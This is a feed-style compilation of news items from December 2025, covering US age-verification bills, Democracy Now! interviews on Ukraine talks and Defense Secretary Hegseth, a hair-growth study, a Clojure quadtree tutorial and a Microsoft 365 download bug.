The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

Non-commercial news needs your support

We rely on contributions from our viewers and listeners to do our work.
Please do your part today.

Make a donation

The Age-Gated Internet Is Sweeping the US. Activists Are Fighting Back

Hacker News
www.wired.com
2025-12-04 13:34:27
Comments...
Original Article

Members of Congress considered 19 online safety bills Tuesday that may soon have a major impact on the future of the internet as age-verification laws have spread to half of the US and around the world .

In response, digital and human rights organization Fight for the Future is hosting a week of events —across Reddit , LinkedIn, and various livestreams —to raise awareness of how it believes these bills are setting a dangerous precedent by making the internet more exploitative rather than safer. Many of the proposed bills include a clause for ID or age verification, which forces people to upload an ID, allow a face scan, or otherwise authenticate that they are not a minor before viewing adult content. Fight for the Future says the policies will lead to increased censorship and surveillance.

Among the 19 bills considered at the hearing conducted by the House Energy and Commerce Committee was the Kids Online Safety Act (KOSA), which passed with sweeping bipartisan approval in the Senate last year, and the Reducing Exploitative Social Media Exposure for Teens Act , which would ban tech companies from allowing minors under the age of 16 on their platforms. In addition to age verification, the bills raised concerns over issues of parental controls, consumer research of minors, AI, and data privacy.

“We’re seeing this huge wave toward ID checks being the norm in tech policy, and it felt like we needed to capture the already activated communities who are not feeling heard in Congress,” says Sarah Philips, a campaigner with Fight for the Future. “If you look on YouTube, if you see people making content about KOSA or responding to a lot of this legislation, it’s very unpopular with people. But it’s viewed on the Hill as very common-sense.”

Missouri’s age-gate law took effect earlier this week, meaning 25 US states have passed a form of age verification. The process usually involves third-party services, which can be especially prone to data breaches. This year, the UK also passed a mandate for age verification—the Online Safety Act—and Australia’s teen social media ban, which requires social media companies to deactivate the accounts of users under the age of 16, goes into effect on December 10. Instagram, YouTube, Snap, and TikTok are complying with the historic ban.

Philips believes the laws are a direct threat to democratic freedom. “These are censorship laws,” she says. “In the South, where I live, these same proposals mimic a lot of the arguments that you see behind book bans and behind laws that criminalize gender-affirming health care or abortion information.”

In March, over 90 human rights advocacy groups signed a coalition letter opposing online ID-check mandates. “The internet is not improved by treating its users like criminal suspects and our lives as opportunities for corporate profit,” David Swanson, campaign coordinator at RootsAction.org, wrote in the letter. “Legislators defunding education to invest in wars, police, prisons, borders, and constant surveillance should think hard before claiming to be acting on behalf of children.”

Though Tuesday’s hearing did not advance any legislation, it included testimonies from Joel Thayer, president of the Digital Progress Institute, and Kate Ruane, director of the Free Expression Project at the Center for Democracy and Technology. “The government and social media platforms should not be—indeed, with respect to the government, cannot be—the sole arbiters of the content children can see and services that they can access online,” Ruane said during her testimony.

Image may contain Advertisement Poster and Text

Fight for the Future’s resistance campaign against online age verification.

Courtesy of Fight for the Future

The package of bills is indicative of how Congress has failed to deliver real solutions, Philips says. “We have repeatedly asked them to focus on comprehensive privacy legislation, on antitrust issues, and on things that actually protect us from the surveillance capitalist business model of big tech companies. Congress says they’re holding big tech accountable, but most of the options on the table just mandate verification.” According to The Verge , a revamped version of KOSA removes tech companies’ liability in mitigating potential harms caused by their platforms.

In an op-ed for Teen Vogue published in October, Fight for the Future director Evan Greer and campaigner Janus Rose criticized Democratic lawmakers who support KOSA, including the bill’s cowriter, Senator Richard Blumenthal of Connecticut. “KOSA takes the same logic of the bans on drag shows and LGBTQ+ books and applies it to the internet, allowing censorship of a broad range of information in the name of protecting kids from real online harm,” Greer noted.

But since KOSA and the Children and Teens’ Online Privacy Protection Act failed to gain approval last year, “it’ll be interesting to see what actually floats to the top right now,” Philips says, concerned that some of the bills could be attached to the National Defense Authorization Act or have the Trump administration’s 10-year moratorium on state AI regulations attached to them, “which is a disaster tornado of tech policies.”

Philips tells me she isn’t disheartened by the work, because she wants people to understand what’s really at stake in the fight ahead.

“The thing that people misunderstand most about age verification is that it actually applies to all of us,” she says. “A lot of the people pushing for age verification solely focus on kids, because that’s the discussion happening in Congress or on the Hill. But in actuality, if we age-gate the internet and implement mandates, that means that you have to prove that you’re not a child—whether you’re 18 or 50. Everyone will have to interact with this.”

Can a Deal Be Reached to End Russia's War in Ukraine? Matt Duss on Latest Diplomatic Efforts

Democracy Now!
www.democracynow.org
2025-12-04 13:25:48
Foreign policy analyst Matt Duss discusses the status of Russia-Ukraine ceasefire talks and new data on the extent of casualties from the now nearly four-year Russian invasion of Ukraine. Hundreds of thousands of people have been killed. “For what did these people die? For what reason were the...
Original Article

This is a rush transcript. Copy may not be in its final form.

NERMEEN SHAIKH : Matt Duss, you’re the executive vice president at the Center for International Policy and also former foreign policy adviser to Senator Bernie Sanders. We also want to ask you about the ongoing negotiations to end Russia’s war on Ukraine. On Tuesday, President Trump’s envoy Steve Witkoff and son-in-law Jared Kushner met with Russian President Vladimir Putin in Moscow for nearly five hours, but a deal to end the war in Ukraine was not reached. Russian officials described the talks as “constructive” but said no compromise was reached on certain issues.

AMY GOODMAN : Witkoff and Kushner are set to meet today with Ukraine’s lead negotiator in Florida for further talks. Meanwhile, Putin is now in India meeting with Prime Minister Narendra Modi. This all comes as Germany’s foreign minister has criticized Russia, saying he had seen no serious willingness on the Russian side to enter into negotiations. And NATO says, of course, that they’re going to continue to supply U.S. weapons — pay for and then supply U.S. weapons to Ukraine. Where does all this stand, Matt?

MATT DUSS : I think, well, I mean, first of all, I would say efforts to end this war through diplomacy are good, and I commend them. I think most Americans would like to see this war end. Certainly the Ukrainians want this war to end. The Europeans want this war to end. But once again, I think we have arrived at the same place, which is that Vladimir Putin does not want this war to end, certainly not on terms that would be remotely acceptable to Ukraine, by which I mean a resolution to this war that sustains and preserves Ukraine’s independence, its democracy and its ability to defend itself.

I think a lot of people were kind of surprised by the extent to which the 28-point plan that was leaked a few weeks ago really, essentially, you know, echoed Russia’s preferences. Some people said it was written in Russia. I don’t know if that’s true, but it clearly did reflect a lot of Vladimir Putin’s own preferences for how the war should end. As an opening bid, I don’t think we should make too much of it. It is good that these talks are going on. But again, I think we’ve arrived at the same place, which is that the person who has a very, very important vote here, Vladimir Putin, is not supporting an end to the war.

NERMEEN SHAIKH : Well, it’s extraordinary, Matt, because I did read over those 28 points, and it does seem, as many have commented, that most of Russia’s demands have been met. So, what explains their resistance to this proposal? And what parts did they — do we know what they took umbrage with, that they don’t want to agree to?

MATT DUSS : Well, I think there are issues. You know, there was kind of a negotiation going on within the Trump administration. You know, Witkoff and Kushner put out this plan or were, you know, involved in constructing it initially. Secretary of State Rubio then made changes internally. There’s a kind of fight between the Rubio and the Vance wing in the Trump administration here, with the Vance wing being much more aggressively trying to end this war.

I think that some of the key concerns were the kind of agreement that Russia — excuse me, that Ukraine would not join NATO as a promise. Some people see that as unacceptable. Personally, my own view is everyone, I think, understands that Ukraine will not be joining NATO . I understand that you don’t want to take that off the table at the outset of negotiations, but I don’t think that should be — you know, that shouldn’t be allowed to be a roadblock to an agreement.

At the same time, I also don’t think that is the only thing that concerns Russia. As I said, Vladimir Putin’s goals here, in my view, have not changed. I’ve seen no evidence that his initial goal of curtailing Ukraine’s independence and bringing it back under, essentially, Russian authority as a part of a broader Russian imperium, that remains his ultimate goal. And any agreement short of that, it seems to me, he’s not going to go for.

NERMEEN SHAIKH : And, in fact, on NATO , which, of course, many speculated that this was indeed the reason that Russia invaded Ukraine, it’s not only that the plan calls for an end to NATO expansion, but it says specifically, singling out Ukraine, that Ukraine should inscribe in its constitution that it will not join NATO , and that NATO would include in its statutes a provision that Ukraine will not be admitted. If you could —

MATT DUSS : Yeah.

NERMEEN SHAIKH : — comment on that?

MATT DUSS : Yeah, I think that that really just goes way, way too far. I think there are — there are commitments that could be made, assurances that could be made with regard to Ukraine and NATO . But again, I do not think that NATO and Ukraine’s possibility or impossibility of joining NATO is really the issue here. It is one among a whole set of issues that indicate Ukraine’s ultimate orientation and its ultimate independence. Ukraine’s independence is the real issue here, as far as I can tell.

NERMEEN SHAIKH : And the plan also says that all parties to the conflict — I mean, Ukraine and Russia — will receive full amnesty once the proposal goes into effect, the ceasefire, if indeed that’s what it is, the peace plan, which seems, some have said, in part, geared towards having the ICC warrant against Putin lifted and also —

MATT DUSS : Yeah.

NERMEEN SHAIKH : — absolving Russia of alleged war crimes, including what happened in Bucha. If you could comment on that?

MATT DUSS : Yeah. I mean, that is — that’s really objectionable. But, you know, again, as hard as it is to say, if that’s something that gets us to an end to the war, a durable end to the war, that is something that we should consider. This is certainly not justice for the many, many victims of Russia’s violence, which has been grotesque.

Unfortunately, the United States itself is not in a great position here, given the cover that we continue to give to partners like Israel for their war crimes in Gaza, clearly war crimes. So, I think the United States and its allies in Europe would be in a much better position to push back against this if we were applying these standards equally, which we are not.

AMY GOODMAN : And, Matt Duss, the significance of the corruption scandal that’s been engulfing the Zelensky administration, with his number two man, Andriy Yermak, the chief of staff to Zelensky, being forced out? You usually always see him at his side.

MATT DUSS : Yeah, no, I think this has been a corruption scandal that has been brewing for a while, and the firing of Zelensky’s number two man, his chief of staff, is obviously very significant. Ukraine continues to struggle with corruption problems that go back a long time. But I also think it’s worth noting, the fact that the number two leader in Ukraine was removed from power because of a corruption investigation is itself a very, very positive step.

NERMEEN SHAIKH : And finally, Matt, if you could comment on the sheer scale of the destruction that this war has wrought, not only in terms of, you know, entire areas in Ukraine being flattened, but also that Russia has suffered over 600,000 casualties? That is to say, people killed and wounded. This is roughly 10 times the number of Soviet casualties suffered over a decade in their invasion and occupation of Afghanistan. And open-source data has revealed that 111,000 Russian military personnel have been killed. Meanwhile, also open-source data shows that there have been about 400,000 Ukrainian casualties. And Zelensky himself has said that 43,000 Ukrainian soldiers have been killed. So, if you could talk about this? I mean, this is a really extraordinary — these are extraordinary numbers.

MATT DUSS : Yeah, it is extraordinary, and it’s just a staggering waste. I mean, for what? For what did these people die? For what reason were they sent into this horrible meat grinder? For what was this destruction done? To take some land in eastern Ukraine?

I think this is — again, as horrible as this is and as horrible it is to consider the fact that there might have to be some form of amnesty, I do also think it’s worth noting that Vladimir Putin, after nearly four years of war, has not achieved anything close to his ultimate goal. And I do think this is worth considering as we talk about the possibility of a ceasefire. Ukraine has performed far — has done greater things than I think anyone expected. So, given the loss of life, given the destruction, I know it’s hard for many Ukrainians to consider having to make some concessions to end the war, but I do think there is a victory narrative here for Ukraine to take.

One other thing I do want to mention in terms of the costs of this war is the tens of thousands of Ukrainian children that were taken into Russia and distributed among Russian families. That is absolutely something we should not forget. That is something on which there should be no compromise. These children need to be returned to their families.

NERMEEN SHAIKH : And what does the — what does the plan say about that, the proposal that the U.S. has put forth?

MATT DUSS : I’m unclear what it says on that. This is something that’s clearly going to be contested as we get into the — if we get into anything close to final status talks, which it doesn’t seem like we’re close to right now.

AMY GOODMAN : Matt Duss, we want to thank you so much for being with us, executive vice president at the Center for International Policy and former foreign policy adviser to Senator Bernie Sanders.

This is Democracy Now! , democracynow.org. When we come back, President Trump says he’s going to limit immigration from, quote, “the Third World.” We’ll be back to talk about this and what’s happening here in New York City, ICE raids that have been thwarted by activists blocking ICE cars. Stay with us.

[break]

AMY GOODMAN : Malian musician Khaira Arby, performing in our Democracy Now! studio.

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

Human hair grows through 'pulling' not pushing, study shows

Hacker News
phys.org
2025-12-04 13:22:35
Comments...
Original Article
Human hair grows through 'pulling' not pushing
The hair follicle organization and the multiphoton setup for live-imaging of human hair follicles. Credit: Nature Communications (2025). DOI: 10.1038/s41467-025-65143-x

Scientists have found that human hair growth does not grow by being pushed out of the root; it's actually pulled upward by a force associated with a hidden network of moving cells. The findings challenge decades of textbook biology and could reshape how researchers think about hair loss and regeneration.

The team, from L'Oréal Research & Innovation and Queen Mary University of London, used advanced 3D live imaging to track individual cells within living human hair follicles kept alive in culture. The study, published in Nature Communications , shows that cells in the outer root sheath—a layer encasing the hair shaft—move in a spiral downward path within the same region from where the upward pulling force originates.

Dr. Inês Sequeira, Reader in Oral and Skin Biology at Queen Mary and one of the lead authors, said, "Our results reveal a fascinating choreography inside the hair follicle. For decades, it was assumed that hair was pushed out by the dividing cells in the hair bulb. We found that instead that it's actively being pulled upwards by surrounding tissue acting almost like a tiny motor."

To test this, the researchers blocked cell division inside the follicle, expecting hair growth to stop. Instead, growth continued nearly unchanged. But when they interfere with actin—a protein that enables cells to contract and move—the hair growth rate dropped by more than 80%.

Computer models confirmed that this pulling force, correlated with coordinated motion in the follicle's outer layers, was essential to match the observed speeds of hair movement.

Dr. Nicolas Tissot, the first author, from L'Oréal's Advanced Research team said, "We use a novel imaging method allowing 3D time lapse microscopy in real-time. While static images provide mere isolated snapshots, 3D time-lapse microscopy is indispensable for truly unraveling the intricate, dynamic biological processes within the hair follicle, revealing crucial cellular kinetics, migratory patterns, and rate of cell divisions that are otherwise impossible to deduce from discrete observations. This approach made it possible to model the forces generated locally."

Dr. Thomas Bornschlögl, another lead author, from the same L'Oréal team adds, "This reveals that hair growth is not driven only by cell division—instead, the outer root sheath actively pulls the hair upward. This new view of follicle mechanics opens fresh opportunities for studying hair disorders, testing drugs and advancing tissue engineering and regenerative medicine."

While the research was carried out on human follicles in lab culture, it offers new clues from hair science and regenerative medicine. The team believes that understanding these mechanical forces could help design treatments that target the follicle's physical as well as biochemical environment. Furthermore, the imaging technique developed will allow live testing of different drugs and treatments.

The study also highlights the growing role of biophysics in biology, showing how mechanical forces at microscopic scale shape the organs we see every day.

More information: Nicolas Tissot et al, Mapping cell dynamics in human ex vivo hair follicles suggests pulling mechanism of hair growth, Nature Communications (2025). DOI: 10.1038/s41467-025-65143-x

Citation : Human hair grows through 'pulling' not pushing, study shows (2025, December 4) retrieved 4 December 2025 from https://phys.org/news/2025-12-human-hair.html

This document is subject to copyright. Apart from any fair dealing for the purpose of private study or research, no part may be reproduced without the written permission. The content is provided for information purposes only.

RAM is so expensive, Samsung won't even sell it to Samsung

Hacker News
www.pcworld.com
2025-12-04 13:20:07
Comments...
Original Article

Michael is a 10-year veteran of technology journalism, covering everything from Apple to ZTE. On PCWorld he's the resident keyboard nut, always using a new one for a review and building a new mechanical board or expanding his desktop "battlestation" in his off hours. Michael's previous bylines include Android Police, Digital Trends, Wired, Lifehacker, and How-To Geek, and he's covered events like CES and Mobile World Congress live. Michael lives in Pennsylvania where he's always looking forward to his next kayaking trip.

Will Hegseth Go? Defense Secretary Faces Anger from Congress over Boat Strikes, Signal Chat

Democracy Now!
www.democracynow.org
2025-12-04 13:18:50
“Pete Hegseth, much like the president he serves, sees himself as, essentially, above the law, as unconstrained by legal procedure.” Foreign policy analyst Matt Duss discusses the brewing conflict within the Trump administration over the leadership of Defense Secretary Pete Hegseth, incl...
Original Article

This is a rush transcript. Copy may not be in its final form.

NERMEEN SHAIKH : The Pentagon’s inspector general is set to release a report today on Defense Secretary Pete Hegseth’s use of the widely available social media app Signal to discuss U.S. airstrikes in Yemen earlier this year. Two people familiar with the report’s findings told news outlets that Hegseth endangered U.S. troops in using Signal to discuss the strikes with several other senior Trump administration officials. The chat, which included Hegseth’s wife and brother, was revealed when The Atlantic ’s editor Jeffrey Goldberg was accidentally added to the Signal group.

AMY GOODMAN : We’re joined now by Matt Duss, executive vice president at the Center for International Policy and former foreign policy adviser to Senator Bernie Sanders.

Matt, thanks so much for being with us. In a moment, we’re going to talk to you about the negotiations around Ukraine. But let’s start with this top news, and that is everything that’s happening right now with Pete Hegseth, the defense secretary, or, as he calls himself, the war secretary. If you can start off by talking about what’s going to be released today, but many news outlets have already reported on, saying that he shared sensitive information with a reporter and others about attacks on Yemen? Talk about the significance of this.

MATT DUSS : Right. This happened last year as strikes, U.S. strikes, on Yemen against Yemen’s Houthi government were about to begin. The Houthis, as people may remember, had been launching strikes on shipping in the Red Sea and on Israel in protest of the Gaza war. The U.S. was about to undertake strikes against the Houthis.

As you noted, the journalist Jeffrey Goldberg was included on a Signal chat of senior administration officials in which, apparently now, classified information was being shared by the secretary of defense, you know, including when the strikes would start and other things that he was not authorized to release. Now, the secretary of defense does have the authority to declassify information if he chooses, as does the president, but none of that, clearly, was done. This was just carelessness. It was reckless. And as the report is going to say, this potentially put U.S. troops and service members in danger.

AMY GOODMAN : And can you talk about the fact that Pete Hegseth refused to sit for an interview or hand over his phone? Is it just up to him, the man who is being investigated himself? And where does Roger Wicker, the head of the Senate Armed Services Committee, and Jack Reed stand on this in this investigation? What do you expect to take place?

MATT DUSS : Yeah.

AMY GOODMAN : Could they force him?

MATT DUSS : Well, I think Pete Hegseth, much like the president he serves, sees himself as, essentially, above the law, as unconstrained by legal procedures, by his own obligations, apparently, to U.S. service members, given that he very clearly put them in danger. So, unfortunately, it’s not surprising that he would not sit for an interview.

This investigation was a form of oversight, an important form of oversight, but I do think the more important form will come when we see what Congress is going to do about it. You mentioned Senator Wicker, Senator Reed in the Senate Armed Service Services Committee. How far do they push this? How aggressively are they going to be toward the administration when this report comes out?

And I think the question really does come down to the Republicans, because, unfortunately, in general, the Republican leadership has been pretty subservient to Trump. They have not been all that willing to assert their oversight authority. But given the recklessness of this act and also some of these other things that have been piling up around Pete Hegseth, including the strikes on the alleged drug boats that he’s facing now, from what I’m hearing, Republican impatience toward him is really, really growing on the Hill, and this could be something that really pushes people over the edge. But we’ll have to see.

AMY GOODMAN : And very quickly, Matt, today, the Admiral Mitch Bradley is expected to testify before Congress about the second strike on that September 2nd boat, what the Trump administration calls “drug boats.” Of course, they have not presented any evidence. Nine people killed in the first strike, two hanging on for dear life, and they then killed them.

MATT DUSS : Yeah.

AMY GOODMAN : The significance of what this means and the overall attacks on the boats, as President Trump says they’re going to attack Venezuela directly imminently?

MATT DUSS : Right. Unfortunately, it seems that Pete Hegseth is using Admiral Bradley as a human shield here. We’ve seen, just over the past few days, trying to put blame — or not put blame. He’s trying to say, “I stand behind Bradley, who gave the order. I didn’t give the order.” They’ve had multiple stories about what happened, what didn’t happen, who gave the order.

But it is important to understand this is happening in a context of strikes that are not — clearly not in the context of war. They are unauthorized. As you noted, there has been no proof given that these are drug boats at all, that these people were engaged in anything illegal, and even if they were, it seems absolutely unnecessary to destroy these boats, to kill these men who have been convicted of no crime.

AMY GOODMAN : And, of course, not just unnecessary, but the question is if this is just outright —

MATT DUSS : Right.

AMY GOODMAN : — murder, if these are war crimes.

MATT DUSS : That’s right. Right.

AMY GOODMAN : And finally, let me ask you about Admiral Alvin Holsey, the African American head of SOUTHCOM , the first Black head of SOUTHCOM , who’s out next week, but was forced out, apparently, in October after his objections to what’s going on with these boats being targeted. The significance of this?

MATT DUSS : Right. I mean, that happened — there was a wave of firings, essentially, early in the Trump administration, especially in DOD , a clearing out of senior leaders who were seen to be not with the program, essentially. And that seems to be what had happened here, discomfort with what was going to be a really aggressive policy toward Latin America. And that’s what we’re seeing play out.

But I do think, as you noted, while this is, you know, really, really, I would say, objectionable and clearly criminal, it does come in the context of years and decades of U.S. abuse and U.S. violations around the world. So, we need a deeper — we need to take a deeper look at the authorities that have been given and abused by successive administrations, not just this one.

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

Functional Quadtrees

Hacker News
lbjgruppen.com
2025-12-04 13:18:38
Comments...
Original Article

A Quadtree is a tree data structure, which is useful for giving more focus/detail to certain regions of your data, while saving resources elsewhere. I could only find a couple tutorials/guides and both were imperative, so I figured it'd be fun to do a functional version in Clojure which runs in the browser.

A demo

In this blogpost I'll show you how to build both a functional Quadtree and the visualization you see below. Imagine the canvas to be a top-view of map and your mouse-position to be the spot you're occupying on the map. Near you, you want crisp details, small cells of high resolution. The further away we get from you/the camera (your mouse-position), the less we care about details.

Be aware that on mobile, you have to click at the spot you want to simulate the cameras position. I recommend you view this on a desktop system with a mouse, where the simulation reacts to the mouse position in real time.

The recursive approach

It's hard to find any tutorials on how to build a general purpose Quadtree, but the 2 I did find both took the imperative approach, ie. editing directly on each node. Nothing wrong with that approach, it can be blazingly fast but it does leave you with the housekeeping, ie. downscaling nodes that are no longer close to the camera. I'd much prefer a declarative definition that rebuilds the entire tree in sub-milliseconds, so let's make that happen.

In this implementation, I want to show a very general functional approach and goes like this:

  1. Read a camera (player,mouse,focus-point,whatever) position
  2. Test if the current node is optimally sized
  3. If not, split into 4 children, goto 2

Optimally sized in this case is just "Am I too far away from the edge of the node" ? If the distance is greater than some threshold, let's say the width of the node, then we split.

Our data model

Depending on your use-case, you can fit as much information as you want into this model. If you're doing some kind of 3D rendering, you might want to keep tabs on neighbor-relations, LOD steps and such, but for the basic tree structure, you just need this:

(defn qtree
  " Instantiates a tree node "
  [[x1 y1 x2 y2]]
  {:root?   false
   :bounds  [x1 y1 x2 y2]
   :center  (mapv #(js/Math.floor %)
                  [(half x2 x1)
                   (half y2 y1)])
   :width   (- x2 x1)})

In fact we strictly speaking, don't need the center/width stored, but it does make life a bit easier.

Given a root node and a camera-position we can determine if we want to split or not, simply by testing the distance from the camera to the center:

(defn distance
  [[x1 y1] [x2 y2]]
  (js/Math.sqrt
   (+ (js/Math.pow (- x2 x1) 2)
      (js/Math.pow (- y2 y1) 2))))

(defn too-close?
  " Determines if the camera is closer than halfway to
    the edge of a node "
  [ node camera ]
  (< (distance camera (:center node))
     (:width node)))

(defn split?
  [ node camera ]
  (and (too-close? node camera)
       (> (:width node) _Q_MINIMUM_SIZE)))

That final check on the width of the node, essentially allow us to recurse until we can't split anymore. In Clojure we have 2 very powerful idioms for walking a tree structure: Postwalk and Prewalk.

Postwalk is a depth-first, post-order walk of the tree which applies some arbitrary function to each element.

(w/postwalk (fn [e]
                (prn "Looking at: " e)
                e)
            {:rootval 1
            :node1 {:data "foo"
            :vec  [1 2 3]}})
"Looking at: " :rootval
"Looking at: " 1
"Looking at: " [:rootval 1]
"Looking at: " :node1
"Looking at: " :data
"Looking at: " "foo"
"Looking at: " [:data "foo"]
"Looking at: " :vec
"Looking at: " 1
"Looking at: " 2
"Looking at: " 3
"Looking at: " [1 2 3]
"Looking at: " [:vec [1 2 3]]
"Looking at: " {:data "foo", :vec [1 2 3]}
"Looking at: " [:node1 {:data "foo", :vec [1 2 3]}]
"Looking at: " {:rootval 1, :node1 {:data "foo", :vec [1 2 3]}}
{:rootval 1, :node1 {:data "foo", :vec [1 2 3]}}

I hope this is an intuitive way to see the path postwalk takes. The function only prints what it sees and then returns it as is, thus the end result is exactly the map we started out with. Notice how we first see the root key, then its value, then both together as a MapEntry, then it goes deeper into the tree.

Now compare that with prewalk:

(w/prewalk (fn [e]
               (prn "Looking at: " e)
               e)
           {:rootval 1
           :node1 {:data "foo"
           :vec  [1 2 3]}})
"Looking at: " {:rootval 1, :node1 {:data "foo", :vec [1 2 3]}}
"Looking at: " [:rootval 1]
"Looking at: " :rootval
"Looking at: " 1
"Looking at: " [:node1 {:data "foo", :vec [1 2 3]}]
"Looking at: " :node1
"Looking at: " {:data "foo", :vec [1 2 3]}
"Looking at: " [:data "foo"]
"Looking at: " :data
"Looking at: " "foo"
"Looking at: " [:vec [1 2 3]]
"Looking at: " :vec
"Looking at: " [1 2 3]
"Looking at: " 1
"Looking at: " 2
"Looking at: " 3
{:rootval 1, :node1 {:data "foo", :vec [1 2 3]}}

Prewalk examines the same elements and in the same way, but the path is what we call a pre-order traversal, which means you see contents of nodes before the elements - And by implication, you can swap those nodes and then visit the elements. All in all, prewalk makes for a very simple recursive pattern:

(w/prewalk
 (fn [n]
     (if (and (map? n) (split? n [x y]))
         (subdivide n)
       n))
 qtree)

Yes, it's really that simple. Given a root-node and a camera-position (x,y), this will recursively resolve all children to the maximum resolution.

The Visualization

If you want to read ahead, I've shared a repo here: Github

The code should run straight out of the box and open a webinterface on port 8020. Shadow-cljs makes light work of compiling anything from a single file to a huge frontend application, into a single JS file.

Running in a browser we get a nice 2D API from the standard canvas element. Basically, to draw our Quadtree we need only 3 things:

  • A Quadtree
  • A function which draws a node
  • A function which draws all children

As you've probably guessed, the Quadtree itself is just a simple map with some keys. But because this is a realtime visualization, I want to create a connection between whichever tree I generated and what's drawn on screen. Fortunately both Clojure and Clojurescript support both atoms and watches:

(def quadInst (atom nil))

(add-watch quadInst :updateQuads
           (fn [_ _ old-tree new-tree]
             (draw-all new-tree)))

By convention in Clojure, we name arguments underscore (_) if we do not care about them. In this case, I only need the new-tree for the visualization. If you're not a native Clojurian you might find this pattern appealing as it gives you access to both the pre-updated version and the updated tree, meaning you can run diffs, add new children to a scene while removing others.

I mention it here for demonstration purposes only, in the latest commit you'll see I actually remove all atoms and demonstrate a 100% pure functional solution without atoms. However for the purpose of explaining Quadtree this is a simple subscription-pattern which most developers will recognize. It ensures that whenever the atom Quadtree is updated, so is the screen.

(defn draw-all
  [ tree ]
  (draw (:root? tree)
        tree
        (get-tree-color tree))
  (when-let [children (:children tree)]
    (doseq [c children]
      (draw-all c))))

However there's a fun detail here. To make it seem fairly consistent I couldn't just use random colors, that would make the entire screen flicker whenever you moved the mouse. Basically, if I have a rectangle centered at 50,50 - I always want it to have the same color. A really neat and simple trick is the 32bit hash, which is succinctly implemented in javascript like so:

function fastHash(str) {
    let hash = 0;
    for (let i = 0; i < str.length; i++) {
        hash = (hash << 5) - hash + str.charCodeAt(i); // Hash computation
        hash |= 0; // Convert to 32bit integer
    }
    return hash >>> 0; // Ensure the result is unsigned
}

Basically my idea is to hash the center, ie "[50,50]" and convert that to a hex color. In Clojurescript, you could do it like so:

(defn hash-str
  " Standard 32bit hash: [..].map((% << 5) - h + ch(idx) "
  [ s ]
  (reduce #(-> (bit-shift-left %1 5)
               (- %1)
               (+ (.charCodeAt %2 0))
               (bit-or 0))
          0 s))

(defn get-tree-color
  [ {c :center} ]
  (let [hash (bit-and (hash-str (str c)) 0xffffff)
        hex  (.toString hash 16)]
    (str "#" (apply str (repeat (- 6 (count hex)) "0")) hex)))

That's basically all you need.

Conclusion

Quadtrees are great when you have more work to do, than resources available. Imagine using a VR headset. Whichever point you're focused at, needs to be crisp in detail, you want the highest resolution possible on your hardware. Everything outside of your focus area should be dialed down in resolution because your eyes won't be able to pick it up anyway, so that compute power can be used elsewhere. There are many other applications.

Clojurescript is great, because it allows us to express ourselves succinctly and functionally. The core of this implementation is only about 25 lines long. That's much easier to reason about and debug, than some other implementations I've seen, which span several hundred lines.

Shadow-cljs is great for more reasons than I can cover in this post, but I will highlight the ability to quickly ship highly optimized bit of JS using only 10 lines of configuration - And they even throw in a free webserver for easy testing and repl driven development, what's not to like?

Full source code: Github

Microsoft 365 license check bug blocks desktop app downloads

Bleeping Computer
www.bleepingcomputer.com
2025-12-04 13:18:08
​Microsoft is investigating and working to resolve a known issue that prevents customers from downloading Microsoft 365 desktop apps from the Microsoft 365 homepage. [...]...
Original Article

Microsoft 365

​Microsoft is investigating and working to resolve a known issue that prevents customers from downloading Microsoft 365 desktop apps from the Microsoft 365 homepage.

As detailed in a Wednesday incident report ( OP1192004 ) seen by BleepingComputer, this bug has been impacting users since November 2nd, causing Office Client issues for affected customers.

Microsoft has already developed and is now testing a fix to address the issue and added that it will provide an update on progress by 6:30 PM UTC later today.

While it noted that the bug may affect any user who attempts to download Microsoft 365 desktop apps, it has not yet provided more details on the extent of the problem.

However, when it acknowledged the issue this morning, Microsoft tagged it as an incident, a designation used for critical service issues that usually involve noticeable user impact.

"Our analysis of the components of Microsoft 365 infrastructure, as well as recently deployed changes, identified that a recent service update containing a code issue is impacting the license check process, leading to users being unable to download Microsoft 365 desktop apps from the homepage," Microsoft said.

"We're continuing to validate and test the aforementioned fix in our internal environment to ensure its efficacy prior to deploying it to the affected infrastructure and we expect to provide an estimated deployment time line by our next scheduled update."

Microsoft is also working to resolve a known issue that blocks some users from opening Excel email attachments in the new Outlook client due to an encoding error in Excel file names.

One year ago, Microsoft addressed another known issue triggered by licensing changes that caused random "Product Deactivated" errors for customers using Microsoft 365 Office apps, while last month, it resolved a bug caused by misconfigured authentication components that prevented customers from installing the Microsoft 365 desktop apps on Windows devices.

tines

Break down IAM silos like Bitpanda, KnowBe4, and PathAI

Broken IAM isn't just an IT problem - the impact ripples across your whole business.

This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.

Headlines for December 4, 2025

Democracy Now!
www.democracynow.org
2025-12-04 13:00:00
Senate War Powers Resolution Seeks to Block Trump from Unilaterally Attacking Venezuela, Admiral to Brief Lawmakers About U.S. Boat Strikes Condemned by Human Rights Groups as “Murder”, New York Times Sues Pentagon over Press Policy That “Violates the First Amendment”, Israel...
Original Article

Headlines December 04, 2025

Watch Headlines

Senate War Powers Resolution Seeks to Block Trump from Unilaterally Attacking Venezuela

Dec 04, 2025

A bipartisan group of senators has introduced a war powers resolution seeking to block the White House from launching an attack on Venezuela without congressional authorization, after President Trump said a land attack would start “very soon.” The resolution was co-sponsored by Democrats Chuck Schumer, Tim Kaine and Adam Schiff, along with Kentucky Republican Senator Rand Paul, who wrote, “The American people do not want to be dragged into endless war with Venezuela without public debate or a vote. We ought to defend what the Constitution demands: deliberation before war.”

In Venezuela, President Nicolás Maduro on Wednesday confirmed he spoke by phone with President Trump about 10 days ago, calling the conversation a potential opening for diplomacy.

President Nicolás Maduro : “I received a phone call and spoke with President Donald Trump. I can say that the conversation was in a respectful tone, and I can even say it was cordial between the U.S. president and the president of Venezuela. I add that if this call means there are steps toward a respectful dialogue between states, between countries, then welcome dialogue, welcome diplomacy, because we will always seek peace.”

Admiral to Brief Lawmakers About U.S. Boat Strikes Condemned by Human Rights Groups as “Murder”

Dec 04, 2025

